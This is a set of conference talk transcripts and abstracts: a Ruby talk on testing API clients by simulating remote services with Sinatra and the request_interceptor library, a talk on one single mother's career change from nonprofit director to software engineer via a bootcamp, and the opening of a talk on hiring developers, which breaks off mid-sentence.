Request Interceptor to intercept all requests that go to anything that ends with any host that ends with example.com. I do my HTTP request and then assert on the equality of the response being hello. The problem with bare metal rack apps is that they are very inconvenient. To sort of implement something more feature complete, you wouldn't necessarily want to go with rack directly and set you want to pick something that has a little more, that provides you with a little more convenience. And for me, this convenience is sort of given by Sinatra which sort of combines simplicity as well as provides you with a lot of flexibility on how to simulate these API endpoints. And for those of you who don't know Sinatra, it is a Ruby micro web framework and it's based around a very simple idea. You have a Sinatra application that provides you with more or less, well, the most important methods are get, post, put, and delete which correspond to the HTTP methods and they allow you to define request handlers in your Sinatra application. So they take a path as the first argument and then a block and the block defines how requests are being handled. So simple Sinatra looks something like that. You don't even need to wrap it in a class or anything. It provides you with some magic to make this work and you require the library, you define that your application is handling anything that comes into slash hello and in this case it returns hello Sinatra. So given this conciseness and this simplicity, Sinatra was an excellent choice to sort of model APIs and therefore makes a great combination with request interceptor. In fact, I went further because of this great combination, it's the combination I would suggest for you to use instead of using requestinterceptor.run with just any rackup I would recommend using Sinatra and requestinterceptor gives you a defined method which allows you to define a new Sinatra application with some extra goodness. So a request interceptor allows you to define the hostname pattern. Again, just as we've seen before, where we submit the hostname pattern and the application to the run method, we now define it right on the application and then we just define it as a regular Sinatra app with all of our endpoints that we need. And the result of this define call is a class again which is a Sinatra application with the added benefits and one of those benefits is that this application provides you with an intercept method. And the intercept method is just a convenient wrapper for you around run. So instead of having to pass in everywhere where you want to use an interceptor, remember which hostname you want to match and which application to pass in, you can just call intercept on your interceptor, provide it with a block and then again a fire of an HTTP request and assert that the correct message is returned. And then more importantly in order to test this, you probably want to know how many requests you made, which requests you actually made and what the request and response data was. And to make this possible, the intercept method returns a transaction lock. So it's simply an array of request interceptor transactions. And these transactions are simply structs which give you access to the request and the response that was made within the block. And these are instances of Rackmok request and Rackmok response, just as other libraries usually use for testing Rack applications. I essentially use these to carry all the data for further inspection. And then the example down below shows you how you can, for instance, assert on the path of the first transaction lock entry. And in this case, I'm just asserting that my program called the path hello of example.com. You can also nest them in case you want to have, you communicate with multiple APIs. And at Shopify, I was on the team that implemented the UBER rush integration. We did that as a separate app. So for us, Shopify was, we also treated Shopify as an API, just as you would if you develop an app for Shopify. And then we treated Uber as our other service. So our application was actually had to communicate with both of these services. And it's often necessary that you know exactly which requests were sent where. And that is why request interceptors do support nesting. So both of these interceptors write a separate transactional log. And yes, of course, the innermost interceptor takes precedence. So if you can actually have two interceptors responding to the same domain or to the same host, in which case the innermost would win and intercept the request. Another important feature is that you can customize an interceptor for an individual test because the idea is that you generally outline your service that you are modeling in a single file and then customize it to certain behavior that fits sort of the needs of your test. Let's say you want to model an error response for one particular endpoint. You would take your interceptor, call the dot customize method on it, and then override the previously defined endpoint. And Sinatra is smart enough that if you redefine an endpoint, the new endpoint will take precedence over the old one. And in this case, we are just switching the hello endpoint from to send another message. Previously it was high rescon, and now it's bonjour rescon. So now that you have a basic understanding on how they work, I want to talk a little about the advantages in comparison to VCR and WebMerc that I think exist when using request interceptors. For me, one of the biggest advantages is that the code isn't cluttered throughout your test suite. Instead, what we do is we have one file that defines a particular service, in our case Uber or Shopify, that implements all the endpoints we are usually communicating with. And then we customize this interceptor to specific needs in our test suite. But if you sort of want to see in one go what your app is actually communicating with, you would just open the file and look at the interceptor definition. Another advantage for me is that interceptors provide greater power and flexibility because we're talking about a Sinatra application. You can literally go as far as you want with that. You could have theoretically an in-memory database that sort of keeps state if you want to simulate entire workflows or you can keep it super simple and return static responses from your endpoints. So it's really up to you. Then, of course, since it's essentially just one file, you can also go further and package it into a Ruby gem. Let's say you build a service that other developers use and you have a public API and now you want to make it easier for people to sort of integrate your service, you could provide them with a predefined interceptor they can use in their test suite. So they don't even think about hitting your API with like requests from their test suite. And then finally, and that is personally for me super important is that the code is just very readable, which is in the nature of the Sinatra application. And I personally think it's more readable than having these WebMock stubs sort of scattered around your test suite. Instead, you have this one single application that defines how your interceptor works. And then there's more. There's features that I am not sure if you could simulate them with WebMock or CR. And so I want to talk a little bit about more advanced concepts on how to use these interceptors. A big one for me is simulating network requests. Reckless interceptors are set up in a way that they propagate errors or exceptions that are being raised in one of the endpoints. So I specifically disabled the Sinatra functionality to handle exceptions and propagate them through the entire stack, which allows, for instance, to simulate that a host is unreachable simply by raising the appropriate exception, which makes it very easy to test your application or the library or building whether it's robust enough to handle these error cases. And then, of course, Sinatra gives you a lot of tools that you can leverage to make interceptor definition even easier and make the code more readable. And one of the most important things is probably that being a standard Ruby class, you can just define private helper methods that you can use throughout your interceptor and throughout the customizations you use in your test suite. In fact, you can just apply standard object orient design principles to, and all that Ruby gives you to sort of make your interceptors as readable and as easy to use as possible. Then there is the possibility of using Sinatra's before and after callbacks that run before or after a particular endpoint is hit. And you could, for instance, utilize an after callback to automatically encode data into JSON. Let's say you're modeling a JSON API. It's tedious if in any endpoint you always have to remember that you, as a last step, have to call to JSON on whatever you're sending over the wire. So just define it once in a block. And in this case, I look at the response and if it's an array or hash, I encode it into JSON. And then, of course, you have the ability to use rec middleware. And in this case, we modeled both Shopify and Uber interceptors as API, as JSON APIs. And so we always wanted to decode the incoming JSON so we can easily work with that in our interceptors. And Sinatra provides you with a method called use that allows you to inject rec middleware that runs before your actual endpoint is hit. Now that you have sort of an understanding on how you use interceptors and why they might provide a nice alternative to VCR or WebMock, I actually want to dive deeper into some of the internals because I just think it's interesting to see some of the powerful features Ruby provides and just as a sort of learning exercise. So in the beginning of the talk, I showed you that a request interceptor.run is sort of the core of the whole idea. And in fact, this is the concrete method implementation as it exists in the library. And there's essentially six steps and I will go over all of these six steps to sort of showcase how you can mess with an existing Ruby library that doesn't provide you with the ability to sort of do this in a clean way. So the first step is because you can reuse an interceptor is to clear the transaction lock. That's very easy. I just clear the array that keeps all the transaction lock entries from the previous run. And then I cache the original net HTTP methods because we have to make sure that once the block finished its execution, we restore net HTTP to its default behavior. And then I override the net HTTP methods with the custom implementation just as WebMock does as well. And then I execute my test. And now my test will essentially use these overridden net HTTP methods. And then finally I collect my transactions and then eventually restore net HTTP to its former glory. And the last part happens in an insure part. So it's always guaranteed to run and so that it doesn't happen that your test suite actually gets into a state where it's where net HTTP is not in its original state. So as I said, it's easy to clear the transaction lock. So I just want to skip that and talk about caching the original methods. There's three methods you need to override if you want to do something like incepting HTTP requests. Just start, finish, and request. So to finish, sort of take care of opening the TCP connection and then request performs the actual heavy lifting. And the way caching works in request interceptor, you have now a concrete request interceptor instance at your hand that is currently handling your test case. And I just assign these methods to instance variables. And what instance method gives me is an unbound method. So I essentially save the original method implementation and just put them for now in an instance variable. And then I replace these three methods with my own implementation. Start and finish are pretty boring. I just make sure that net HTTP things, it has an open TCP connection it is communicating with, but in fact I don't need one because of how the redirect to the Synapri application is working. And I'll show that in a second. And then I define a new request method, which is a little more interesting. The interceptor instance itself that is currently handling your test case has a request method of its own. And all I really do is I take the data that would usually go to net HTTP request and redirect it to my interceptor. And then I also pass in the interceptor itself. I won't show the code for request interceptor request because it's a little more complex, but I at least want to explain what is going on. And you can always take a look at the source code if you're interested. So the first thing I do is I try to find an appropriate interceptor, meaning I look at the HTTP request and then look at the host name of this request and now go through my list of host name patterns and stored applications and see if one matches. If I find one, I now build a mock request and mock request, the initializer of mock request takes a rack application as its first argument. Once I have that mock request initialized, I can call the methods get, post, put, delete on them to simulate an actual HTTP transaction. And once that happened, I get back a mock response, which I now have to transform into a net HTTP response to make net HTTP believe that it actually just talked to remote service. And then I log the transaction, meaning now I'm taking the mock request and the mock response and just writing them in my transaction log so they can be further analyzed in a test suite. The interesting thing is what happens if no interceptor actually matches your host name because I wanted to implement it in an unobtrusive way. I didn't want it to block just any HTTP communication, especially to be still compatible with MAPMAC and VCR. So what happens is my current net HTTP instance, which is now in this weird state that it talks to the Sinatra application, has to be restored to actually be able and perform network requests. And the way I do this is shown on the next slide. But once I restored it, I essentially perform the request as if there would never have been any interceptors in the way. And method restoring works by utilizing Ruby's defined method, which actually can not just take a block, but it can also take an unbound method. So the ones we previously stored in instance variables, we can now rebind to net HTTP. And we can even rebind them to concrete instances of net HTTP. And it is sort of happening when the request interceptor doesn't find a matching application. It rebinds the original methods to the concrete net HTTP request that's currently going on and then just calls request again and performs the request as if nothing ever happened. So that was essentially the internals of how the request cycle works in request interceptor. And if you compare that to WebMorque, there's certainly similarities with the difference that you define a stub within your test. And in this case, I redirect to the Sinatra application. I previously mentioned that there is error propagation that you can utilize to sort of simulate network errors. And I just wanted to quickly show how this works. It is very simple because Sinatra supports it by just using particular configuration statements. So all you need to do to sort of have a Sinatra application actually raise an exception and not handle it and have the calling code take care of that exception is you disable the show exceptions and you enable raise errors. And by that, you sort of switch Sinatra into an aggressive mode, which does not make sense if Sinatra runs in a product as your production application, but it makes a lot of sense to sort of simulate these network request errors. Well, I do have further plans for request interceptor. So one thing I want to implement is the support of traits, sort of similarly named like the factory girl mechanism where you can define what your factory is building and then give it a certain trait of how it is actually building. And I want that for interceptors as well because I was running into the issue that I was simulating the same endpoint several times. And what I did so far was just having a lot of these customized request interceptors. But what I actually want is just in a particular test case, I want to have a name where I can refer to an endpoint definition and say I want my interceptor to run with a faulty implementation of my hello. And the faulty implementation could either be raising a 500 or raising a network error. And I want to support different adapters. So I don't want to just stop at net HTTP. The next thing I want to implement would be Faraday because Faraday would give me exposure to several other libraries because I don't really want to do a mess around with each of these libraries individual. Yeah, that is sort of the two goals I have in mind right now to bring this library forward. And that basically brings me to the end of my talk. And I just want to quickly summarize what I've been talking about. So request interceptors sort of provide a third alternative to VCR and Webmark. The thing I like most of them is that I have a concise service definition in one place instead of scattering this definition across the entire test suite. And they provide me with an easy mechanism to customize them if there is the requirement in a certain test. And then finally, Sinatra provides we with a lot of simplicity and flexibility which ultimately leads to very readable code, which is just something I greatly enjoy. If you're interested to take a look at the slides again because I know it was a lot of content I was going over, they are available online. Thanks a lot for your attention.
|
Nowadays, we often rely on third party services that we integrate into our product, instead of building every aspect of an application. In many cases, well written API clients exist, but on occasion you run into the issue that there isn't a ready to use client or it simply doesn't fit your needs. How do you write a good API client and more importantly how do you test it without hitting the remote API. So far, the standard approach has been replaying requests with VCR or stubbing them with Webmock. There is a third option: simulating foreign APIs with Sinatra from within your test suite!
|
10.5446/31514 (DOI)
|
Thanks for coming to the last talk on the second day. I'm sure you guys are totally jump into go out and enjoy the rest of the evening but I appreciate you taking time to come tonight. I'm Teresa Martini and I'm gonna the title is director to Intern Changing Careers as a Single Mom but really the core of what I'll be talking about is humility and audacity and facing things in our lives that feel impossible and sitting with the discomfort of that. I work with OMARA Health and we support people with preventing chronic disease so the majority of our participants might be in situations where they're prediabetic or have heart disease and we provide a program for that. But before I got to this place in my life I guess the other big piece about this talk is this isn't a tech talk or a how-to this is more of a story and and the journey that I've been on for a while now and so I'm gonna start at the beginning when I was a Florida Gator any Gator fans in the audience? No, at least like no none. So I was a Gator and but I didn't get an engineering degree as a Gator I got a degree in anthropology and but can't really get much of a job with a degree in anthropology or an aspiring degree in anthropology so I ended up working at the Northeast Regional Data Center on campus and began learning HTML and this was back when HTML was called Wilbur. It was HTML 3.2 and so it was in 1997 and websites looked like this and and this was the good shit and and so I started my career then and then over the next couple of years learning HTML standard generalized market language. In 1999 I started learning cold fusion back when it was a layer of cold fusion and and I learned that by just kind of like poking over somebody's shoulder on another team and being like that's really cool what are you doing that seems way better than what we're doing with these static HTML templates and they were like yeah come on come learn with us and so I went and joined another team and started moving my way up and and so I did that for a couple of years I did cold fusion in spectra and started working my way into Java and and then the 2001 bubble burst and mind you this whole time in my head I'm thinking why the fuck are these people paying me so much money to do this I don't have a degree in it it's not my background and I this the imposter syndrome was really deep I was always the only woman on my team I never met another woman engineer so this is amazing to me and so when the bubble burst and I knew all kinds of senior engineers who knew Java fully weren't just starting to learn it and they couldn't get work because kind of work was so slow I was like well you know oh this is also sorry just jumping head a little bit so to give you a context if you were young enough that you weren't around back then employment declined by about 17% loss of 85,000 jobs and so if you look at this 97 is when I got started and then the peak went up and then 2001 is when when the bubble burst on this graph and so you know I figured you know until things pick up you know until I get another gig I'm gonna go volunteer with domestic violence agency it's in town I was in San Francisco at the time and and so I started volunteering and then they're like oh we really need someone to fill this position would you mind just working for us for a little bit I know you're you're that's not your career you've got one more experience that just just for a little bit like sure like glorified volunteering that's about how much you got paid and but the thing is is this is how they were tracking data it was agonizing for me I like wanted to cry I may have cried at seeing how awful the situation was in the nonprofit sector and their tech capacity they had this shelter that I was working at had a dial-up modem like that kind of dial-up modem on one computer that's all they had for the whole company and so none of the social workers had computers to track data for clients everything was written on paper and like literally they had someone in a van driving between the different locations to pick up these binders and transport them and then do more of this business sorry that business and the paper and it was it was painful so I wrote grants and I got them computers and I built them a VPN and I built them a server and I built them a website and it's in three languages because they have a lot of clients who speak different languages and I did all that and it felt really good and I got paid shit but it felt really good and I felt like I was making a really big difference and and then the getting paid shit thing became a little bit of a problem because I became a mom I decided to adopt my son June 2008 and and he if I hadn't done that work I would have had a hard time adopting him because I learned a lot in my work that has made me a better mom but he was a big part of my daily life obviously as mom and was coming with me to work this is me carrying him during the walk against rape because I worked for women against rape and and so but then you know things started settling with me being a mom and I this whole time I've gotten the back of my head like this I'm still gonna I'm still going back to programming I just you know just not yet not yet you know and so then after things settled that being mom I started getting this seed planted of an idea that I was gonna take that step and go back maybe go to grad school maybe do something to really solidify those skills and and get back on track because you know I got a little you get a little rusty with time and I continued volunteering on the side and building websites on the side for a bunch of different nonprofits but they weren't I wasn't I wasn't doing engineering and I wasn't building dynamic websites because they couldn't maintain them so I was just building static HTML and teaching them how to how to do them on their own so I'm like making that step starting to think about it again and then I had my daughter so now I'm still a single mom and I've got two kids and boy is that getting paid shit part starting to bite me in the ass at this point and and so this is 2011 and she also is coming with me to work she came with me to work for eight months I carried her and wore her my colleagues carried her and she was there outreach materials permanently our marketing prison and so then 13 years later after my oh you know after a little while it'll pick up 13 years later I'm having dinner with a friend of mine and she says hey have you heard of boot camps there these my friends started this really cool boot camp where you go and it's like 18 weeks and you learn how to be a software engineer and then you get hired afterwards and people make like eighty five hundred thousand dollars I know someone who made 125,000 out the gate and it's like that sounds like bullshit and and it's ended kind of crazy to me but I looked into it a little bit and so then I read on the website you know most people spending 12 hours a day six days a week and the place was like that also sounds like bullshit as a single parent that's really that sounds impossible right and then I look at the cost and and this is basically what I thought of all of it and this is impossible it's insane there's no way I can budget it there's no way I can justify that much time away from my kids there's just no way like everything's just no way but I'm stubborn I'm really stubborn and so I decided what would it be like to sit with that impossibility that sense of impossibility and that I can't do it and what would it be like to just try and take time and be calculated about it and try to make it work and find the money and find the community and resources and so I jumped and I decided to quit my job December 2014 I applied to Dev Boot Camp and in January I was accepted and I resigned from my job I decided I wasn't going to do the halfway I'm gonna work part-time and do they have a period that's called phase zero for nine weeks where you're working remotely and most people work so keep working their jobs until then and I was just like no because I knew that in order for me to be successful I wasn't gonna be able to do the commitment that everyone else is gonna be able to do on-site where they're most of my cohort basically lived at Dev Boot Camp don't tell anyone because you're not supposed to sleep there but people do and I couldn't I had to leave every day and I had to go home and still take care of my kids but so February I got started there were a lot of risks involved around like couldn't do the full hours not guaranteed a job offer and going back to my previous career would have been possible because I was the director and I had a lot of respect in the community but but it would have been it would have been a conversation for sure like why did you have this gaping hole in your resume I was trying to change careers but decided to come back you know people in the nonprofit sector are very concerned about long-term commitment of their staff and so that would have looked really bad so a lot of risk involves and so self-care was a huge thing for me during this process it was really important that and part of that self-care was setting those boundaries and saying you know no I'm going to go home at six o'clock I'm going to read my children their bedtime stories I'm going to tuck them in at night and then I'm gonna keep going but I'm also not going to stay up all night long coding I'm gonna cut it off at 10 o'clock because I write shitty code when I'm tired and I actually write pretty good code pretty fast when I'm well rested so what I would be macking my head against for two hours at night late at night I do in five minutes the next morning so that was part of my self-care process and I asked a million questions a million I can't even fathom the amount of questions that I asked because if I tried to pretend that I knew shit I would get nowhere and if I just put myself out there and kept asking and asking and exposing my ignorance a million times a day I would make progress and I also felt like it was really critical for me to be a mentor because even though I knew nothing I knew a little bit more than the people coming behind me and so every phase of of the boot camp I was mentoring someone else and when I finished the boot camp I became a mentor at hackathon and I taught classes at woman who code I think that's where I taught it and kept teaching people and rockets so one of the other strategies I that really helped me be successful was they had they have all these coding challenges in the boot camps right and so you're supposed to go through and do all of them well that was impossible I did simply did not have the time and so I would just jump straight to the hardest thing that they had and I would just dig in deep with that and and it served me really well and it was so fun and so staying really closely connected to my sense of joy around coding and not letting it be this painful process and was also a really big part of me being able to be successful with it and I was all about celebrating my failures because I knew when I was failing I had some shit to learn and it was amazing and so anytime I couldn't get a test to pass or anytime that I didn't know the answer I was just like yes I've hit a place where I can move through and I've identified it and now I can learn and overcome and then hit the next failure and it's gonna be beautiful and so yeah I if you're ever in a situation where everyone around you is having success and they're high-fiving each other I totally encourage you to turn around to the people you're failing with and high-fiving like yes we're failing and we are going to get through it and learn so I'm celebrate that learning process so I finished our bootcamp and and it was time and this was June 2015 which I don't know if the last speaker is here but the last speaker was talking about when the Supreme Court decision was handed down for gay marriage rights that happened that weekend it was amazing so we can celebrate and so interviewing was this whole nother place right because I had gone through this program and and I needed to get on my feet and interviewing in tech in the tech industry had changed directly from when I was in before before you just get hired on this contractor basically and it was the temporary contract and if it went well you get hired on full-time and if it didn't move on and it was kind of a mutual thing and there was no whiteboarding ever and and so but this really awesome strategies that I had in my head was I would bring the whole weight of feeding and housing my children to the interview in my head it was great I was so stressed that I couldn't think about anything I couldn't like people would ask me these basic questions and information was absolutely my head and I could not get it out and then there were times when I actually had managed to get it out and there with this one guy he had a stack of papers right and he the rose and on the paper and says you're amazing and goes on and on about how amazing I am I didn't hire me and so I started to get also this like feeling that I my assessment of situations was worked and like I would think the things are going well and they weren't and so it just went into this really back to this the space of determination but feeling a little sorry who's hope and and so I was in this place of often like when I was losing hope that weight of taking care of my children became heavier and this happened in my mind all the time and so what I did was I needed to turn back to community I needed to stay rooted this is my cohort that I went through W camp with and I turned back to them and was just like y'all I'm struggling I'm not just struggling I'm not like it's I'm struggling emotionally like I'm getting I'm spiraling I need I need to get grounded and I need help so I started checking in with a group of people weekly and they were phenomenal and supporting me and and then soon after that I got this awesome breakthrough I got an interview with Omara and and this was the interview and it was the most amazing interview ever we paired for the day on a story that was in the backlog and that went into production that day and it was just so much fun it was a pleasure to work with them on this story and it was like even if I don't get the job that was just a really reaffirming experience of just getting to code with people and and I had met Lily through Rails bridge and she connected me with the interview and I began being a software engineering intern with them and so that was September 2015 and and again lots of risk and I turned down a couple of full-time positions with other companies to take this internship and it was banking on the notion that this team is amazing and this company is doing amazing work and gonna learn so much more as an intern in this program with mentorship and guidance and pairing than I will going into this full-time position with this other company where their mentorships seemed a little more shaky maybe not as solid as Mata's was and but again not guaranteed a job didn't have health benefits I was still was still taking more risks and so I asked again a million questions what does this give us like why are you doing this this way and you know I hear what you're saying but I have no idea what you're saying what it means on a more fundamental level like you're going through a process sure I hear you but what is what is the underlying code mean and I noticed this thing breaks the build randomly is there another way we could approach this haven't tested a situation like this before what do I need to consider like these are all you know I it's just a consistent pattern I've had in my life of exposing ignorance and and in order to move forward at a more rapid pace and you write the most scalable well-tested object oriented software in the world said nobody ever because that's not my goal that would be ridiculous for me to ever expect but it's one of those things we're like you want you want to hear that and but it's letting go of that ego and letting go of your expectations and accepting that really the best compliment I could have ever gotten from the team was that you asked the best questions of any in turn we've ever had because that means that I'm going in the right direction and and there was a solo project that I did during this internship where where so the team pairs and we have an agile process does anyone not know what those two things mean awesome so with a solo project you go off on your own you're not pairing for months and again I went through this a similar kind of feeling that I was getting during the interviewing process where I was feeling isolated and alone and disconnected from the team so I decided to start pairing like so going next to a pair like the pair would be here and I'd be like just sitting near them and I implemented my strategies that I needed to feel connected and and be able to feel like I was part of the team and they've learned so much during that month and then it was time to come back to pairing and as a junior developer it's so easy when you're pairing to just let the other person drive all the time because they're fast and they know what's going on and they don't have any questions they're not nearly as many questions as I do and and so my co-worker had this amazing idea she brought me some toys she was like give these to people you're pairing with and so that way they would step back and would keep their hands busy while I was able to take the initiative to step forward and drive and this is how I feel about my team they're a really really incredible team is my thing not showing how long has it been not showing I'm like looking at this screen and seeing awesome can you fix that while I do this all right oh thanks you guys are great cool well I really love my team this is a really great picture of them and we're all celebrating together and maybe you'll get to see it and and I can't say thanks I'm a little lost and oh and so soon after in January I got hired on permanently as a software engineer with oh my yeah it was it was a very very exciting and hard one but I must keep looking through because it helps me know where I'm going and and now I'm part of this much larger amazing team of about 40 or 50 and engineers I don't know maybe making shit up around 40 yeah Lily's one of the amazing engineers on my team and and my kids and I celebrated and and it's funny because I asked my son you know if you if you could describe what I went through with changing my career to somebody what would you say and he was like you're really stressed out mom and and that's kind of one of the I think they bore the Brent of of that process and my mind still goes blank and I'm still ignorant and I just want to encourage you to when you hit a point where you feel like you can't do something to just I really love miss Frizzle I don't know you guys like the magic school bus it's pretty awesome show you should watch it even without children there we go so I just want to encourage you to take chances and and get messy and I still want to show you picture and that's that's it you guys any questions yeah you know one thing that Ohmada and debut camp both did that made a world of difference for me was being flexible with my time so for example most of the team leaves at 6 and I leave at 445 I also get in earlier than anybody else usually when I get in the only people there the chief architect and the CEO and so allowing me to to do that it means I solo a lot in the mornings but it's really great for me to be able to do that because I can sit there I can pick up a story and I can dig into the code and read so that when my pair comes in I'm more able to just kind of jump in and then Ohmada also has great health benefits for kids like the it's actually not that expensive for me to ensure my children which is great in the in the nonprofit sector I always had to pay full like full price for me because it was really expensive to ensure them so there was that I'm sure you guys do lots of other things oh I mean it's the team's just really supportive their times when I am struggling with something at home and I can talk to my colleagues and team members about what's going on and get their support and they're not just like oh my god she's talking about her children and and there's actually I'm not the only parents on the team there are two other parents that are on my direct team so there's a lot of empathy yeah um so there's a few questions in there so I'm gonna hit them when I time so when you asked about the salary and how I felt I true how true I felt that to be and I was within I got hired out of the ring within the range that they said to expect I think the people who it means it you sneeze it okay cool and so the higher in range where my friend was like I know people who've been hired on at 125 usually those are people that already have tech backgrounds maybe in a different aspect of it like UX or design or something and they're kind of expanding their school set but aren't brand new to it so yeah um otherwise you asked a bunch of questions what were the other questions the time commitment for the program yeah people won't weigh beyond the time commitment that they said to make I couldn't do it so I just I did not do the time commitment that they tell you you need to and I told them ahead of time like this is what I can do can I come through the program and they're like you can try like me as well sign up like we're not gonna stop you but it's gonna be hard and it was yeah imposter syndrome like what you talked about the imposter syndrome what helped you get through that I'm feeling that like right now yeah imposter syndrome's a bitch and so I don't think I got through it the first time I think I succumbed to it and I left and I didn't put the amount of effort that I could have to keep going and I think part of it was because I was really inspired but by what I was distracting myself with and that felt really powerful to me and healing in a lot of ways but part of it was also because I was like oh well there are all these people I know who are way more awesome than I am who have been hired on and or who can't get work so I wasn't trying as hard as I probably could have but then this time I think this time I just said fuck it this time I said I really kept the mentality of I love this this is something that I was really passionate about and had so much fun doing and and I remember my colleagues back then and they didn't know anything either like they were learning as they went to and a lot of them had CS degrees but they I feel like there are a wide range of skills that you need to be an engineer and some people are seriously lacking and being able to interact with people and that makes you a really bad engineer and then there are some people who may not have like the fastest typing and the most you know the ability to very quickly come to a solution about a problem but but you have the ability to look at the bigger picture and and think about the team as a whole in ways that maybe someone else can't and I think you just have to really appreciate yourself for your skills that you have and recognize that code is code and you can learn it and it's and it's hard and everybody struggles everyone hits their head against stuff I have senior engineers on my team right now that sometimes take a couple days to figure out a solution to a problem because it's complex and so do I and that's okay and just keep asking a lot of questions and if that answer your question really quickly I've been doing this for almost 20 years and I still start with that they made me the manager of my team and I think part of it is each thing that you pick up is a new challenge a new ticket you don't know how you're gonna solve it until you solve it and you just have to keep that in mind and kind of just say you know effort like you say I'm just gonna try and I almost always figure it out and if I don't ask for help so you know thank you but my question was about the bootcamp itself do you feel like that does that give you enough to to to be able to take on the job that you have now and and not not not get not be too lost you know what I mean too lost too lost you know I mean sometimes you can try to solve a problem and it's like actually looks like there's five problems in this one problem and I'm not sure where even they get start you know I don't know I mean it maybe this is part of my bias for doing it for a long time because I think it takes a while to just learn how to solve the problems but you know I'm trying to get into my head how useful are these boot camps um I I guess I disagree I feel like learning how to ask questions learning how to follow the clues that you see in front of you reading errors and paying attention to the details I don't think it takes that long to learn that and I feel like it is something you can pick up quickly I I felt like the camp was amazing I learned I learned how to learn and I learned how to let go of any ego and I learned how to be humble and audacious at the same time and believe in myself and and not see something as too hard to overcome and like you know fairly early on probably when the first weeks I was there they were like hey here's where the gems are when you install when like when you build rails these is this is where the gems are go open them read the source code like just go through and just read thousands of lines of code a day read a thousand lines of code a day go through read a hundred pages a thousand pages in a book a day like just go through and just consume what you can and eventually you'll see patterns and that's what code is looking for a lot of it's just looking for patterns and and how far I don't want to go over my time it's 206 I'm over time aren't I now how much time do I have five minutes thank you and and so learn yeah I feel like that's what the boot camps do they teach you how to learn and you can they pick a language but you can apply that same process to any language and pick it up so that's I feel like what boot camp rivers are really really good at is just like jumping in and I'm learning something quickly and you had a question sure so you're like maybe not an expert at being in engineering but you're an expert at being a mother so what's one thing that's easier for you as an engineer because you've been a mother I would never say I'm an expert at being a mother and yeah no I feel like I honestly would never ever in my life call myself an expert at anything because that would mean that I have hit the end of my learning process and I will never get there on anything because I'm always going to be learning and trying to be a better person but to your question about what about parenting has informed me as an engineer I mean I think there are a lot of things I guess being like it's funny someone mentioned something about like healthy relationships and how giving people specific positive feedback is actually a strategy for people for couples that last a long time I'm single what do I know but but but it's that's a strategy I've used as a supervisor so used to be a director so I used to have a whole huge team of like 125 people that I supervised and so that as a supervisor as a parent as a teammate you know on my current team that is something that's always served me very well giving people very specific and positive feedback not just like you're great to pair with but I really appreciate when you I really enjoyed how you wrote the test and I made the test pass so I really enjoyed how you had me rate the test and then you made the test pass and and so giving specific getting really specific about that has been has served me well and one example I was curious if when your interview process if you faced any sort of age discrimination did you face people asking you about your age or did you face anything like that and if so how did you how did you address it I'm not sure if you're assuming that I'm younger old you look really young but I know you've got a couple of kids yeah I mean I guess I am one of the older people on my team I'm 37 I I don't think I faced age discrimination maybe I did and I wasn't aware of it I don't know that I think I think more than anything I don't know that it was I don't know that it was directed discrimination it's more the process of interviewing right now is is is not optimal I think that the process and actually you were describing it sir I don't remember your name we were talking about this earlier today he was describing an interview process that his company does and I went through a similar interview and it was awful it was the most anxiety-ridden interview I've ever had I was not able to communicate my knowledge barely at all because I felt like I was just being hammered and it was more like an interrogation than an interview one guy literally cut me off like every question he would ask me I would answer and he cut me off while I was talking and he hammered me with another question and then as I was answering that one he cut me off and hammered me with the next one and and that's just a really shitty way to interact with people that's just not very humane or kind and honestly I left that interview being like I don't want to work for your company even if you make me an offer because I don't want to work with people who are gonna interact with me like that I don't want to work with team members who might be cutting me off and moving us along in that way I feel like there are much more there are much better ways to to be so I would just encourage people to examine your interviewing strategies and what those strategies are serving like what purpose they're serving and and I would and how they are leading you towards your goals and how you want to build your team yeah okay thank you
|
At the beginning of 2015 I was a Director in the non-profit sector, 13 years into my career. My days revolved around crisis intervention and violence prevention. I kept people alive and was well respected in my field. A mom of two, flying solo, people thought I was brave, stubborn... and a little insane... to step out on the ledge of career change. Come on out on the ledge and humble yourself with me. It'll make you a better engineer.
|
10.5446/31519 (DOI)
|
Thanks for showing up. I'm excited. This is my first, like, AM talk where people aren't, like, hungover. And so I'm super stoked that all of you are awake. Presumably awake. I'm told there's a lot of jet lag if you're coming all the way from Seattle. But hopefully that will work. My name is Joe Masty, and let's talk a little bit about hiring developers. So I am a consultant. I work in a lot of things with companies, but I tend to work with them on their onboarding, their hiring processes, working with apprenticeships and stuff. And one of the things that I've noticed both with companies that work with me and some that maybe should is that we have a problem with hiring. And this is a big issue, right? How many of you have at your job a job posting that you cannot fill for a developer? Right? There's a lot of us. It's a big deal. And these are not, in a lot of cases, this is not just, like, oh, hey, we could use an extra person on the team. This is, like, an exigent threat to your business. This is a big deal. And interviewing is hard. Another show advance. I like show advance stuff. How many of you have received a terrible interview? Has anyone ever attended? Yeah, so you go on, like, they just don't have their shit to go. Does anyone want to cop to ever having given a terrible interview? Okay, I have. Good. I was hoping that somebody would actually, you know, cop to that. And I think that this is funny because, you know, even big companies, you think about, like, the Googles and the Facebooks and all these companies that have, you know, 10,000 developers, they're not actually doing better. Their interviews are just as terrible as the rest of us. And that, to me, points to the fact that interviewing is, in fact, difficult. It's expensive. Anybody that you have on your interview team also has a full-time job, right? So these engineers who you expect to take hours and hours out of their day also have a complete set of tasks to deliver. Also on the candidate side. So anybody who is applying for your job, they may also have another day job. They probably have other things going on in their life, right? And if you think that that's not your concern, remember that the candidates that you really want to hire are the ones that probably already have a job in other places where they're applying. So if you give somebody, you know, 100-hour homework, they're just going to move on, right? And I think that we're making it ultimately worse on ourselves. We're not really doing any favors. My informal sense of how we tend to get an interview is how did I get hired, right? So I've been interviewed in a bunch of different ways. That would seem kind of cool. Maybe we'll do that one, or maybe we'll try something else. So it doesn't do us any favors whatsoever. And I'll tell you now, there is no perfect interview. So we're going to talk through a lot of things and make interviews better or worse, but there is no correct, per se, answer. I will say that there are a lot of bad answers. And the bad answers are the ones that in large part we're doing right now. And the result of that, clicker doesn't work. Yes. Is that this happens. So this is one of the main contentions I'm going to make to you. I wanted to put it in early because I want you to think about this. The reason that our interviews are bad is typically that we are not measuring what we think we are. All right. When you have a bad interview, when you have, you know, puzzles, when you have abrasive interviewers, you're not measuring the candidate. You're measuring the interviewer. And the entire point of the interview, obviously, is to see whether that candidate is good. And so this is ultimately why you end up turning down good candidates. This is ultimately why you end up accepting bad candidates. This is why you have 200 interviews and never offer anybody a job. It's because you're not measuring. And I don't think that this is on purpose, right? Nobody's bad on purpose. What's happening is that we don't have a tool set. We don't have a mental schema for how to evaluate if our interviews are any good. We tend to be engineering types. We're not coming from an HR background. And so usually it's that made it up. So good news, even if we have not 